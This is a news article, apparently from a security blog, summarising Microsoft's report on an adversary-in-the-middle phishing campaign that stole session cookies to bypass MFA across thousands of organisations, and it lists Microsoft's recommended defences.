Microsoft Says Phishing Campaign Bypassed MFA, Targeted 10,000 Orgs

Summertime is great for so many things. Warmer weather, longer nights, cold drinks, hiking, biking, fishing, and... phishing.

Yes, while you are out on vacation enjoying all the good things that come with summer, cybercriminals are still hunkered down in their virtual caves creating new phishing schemes to make everyone's lives more difficult.

Microsoft recently said it discovered a massive phishing campaign that used adversary-in-the-middle (AiTM) phishing sites to steal passwords, hijack a user's sign-in session, and skip the authentication process even if the user had enabled multi-factor authentication (MFA).

The threat actors behind this campaign then used the stolen credentials and session cookies for follow-on business email compromise (BEC) campaigns against other targets.

Microsoft says the AiTM phishing campaign has attempted to target more than 10,000 organizations since September 2021.

What is adversary-in-the-middle (AiTM) phishing?

According to Microsoft's 2021 Digital Defense Report, phishing remains the most common type of malicious email observed in its threat signals. It notes that while MFA provides an additional layer of security, and many organizations have adopted or plan to adopt it, threat actors are finding ways to circumvent it. One of these ways is AiTM phishing. So what is it?

Microsoft dives into this question:

"In AiTM phishing, an attacker attempts to obtain a target user's session cookie so they can skip the whole authentication process and act on the latter’s behalf.  

To do this, the attacker deploys a webserver that proxies HTTP packets from the user that visits the phishing site to the target server the attacker wishes to impersonate and the other way around. This way, the phishing site is visually identical to the original website (as every HTTP is proxied to and from the original website). 

The attacker also doesn’t need to craft their own phishing site like how it’s done in conventional phishing campaigns. The URL is the only visible difference between the phishing site and the actual one."

Microsoft provides a visual representation of this process:

The report continues to describe the process:

"The phishing page has two different Transport Layer Security (TLS) sessions—one with the target and another with the actual website the target wants to access. These sessions mean that the phishing page practically functions as an AiTM agent, intercepting the whole authentication process and extracting valuable data from the HTTP requests such as passwords and, more importantly, session cookies.

Once the attacker obtains the session cookie, they can inject it into their browser to skip the authentication process, even if the target's MFA is enabled."

Based on Microsoft's analysis, the company detected multiple iterations of an AiTM phishing campaign that targeted more than 10,000 organizations in the past year, and that it uses the Evilginx2 phishing kit for its infrastructure.

Defending against AiTM phishing

Microsoft highlights the fact that while AiTM phishing emerged as a way to bypass MFA, MFA is still an essential security measure for organizations to implement that does defend against a wide variety of cyberattacks.

It says that with MFA, end-users should implement the following solutions and best practices to better protect their organization:

• Enable conditional access policies. Conditional access policies are evaluated and enforced every time an attacker attempts to use a stolen session cookie. Organizations can protect themselves from attacks that leverage stolen credentials by enabling policies such as compliant devices or trusted IP address requirements.

• Invest in advanced anti-phishing solutions that monitor and scan incoming emails and visited websites. For example, organizations can leverage web browsers that can automatically identify and block malicious websites, including those used in this phishing campaign.

• Continuously monitor for suspicious or anomalous activities:

  • Hunt for sign-in attempts with suspicious characteristics (for example, location, ISP, user agent, use of anonymizer services).

  • Hunt for unusual mailbox activities such as the creation of Inbox rules with suspicious purposes or unusual amounts of mail item access events by untrusted IP addresses or devices.

For more technical information on AiTM phishing campaigns, read the report from Microsoft, From cookie theft to BEC: Attackers use AiTM phishing sites as entry point to further financial fraud.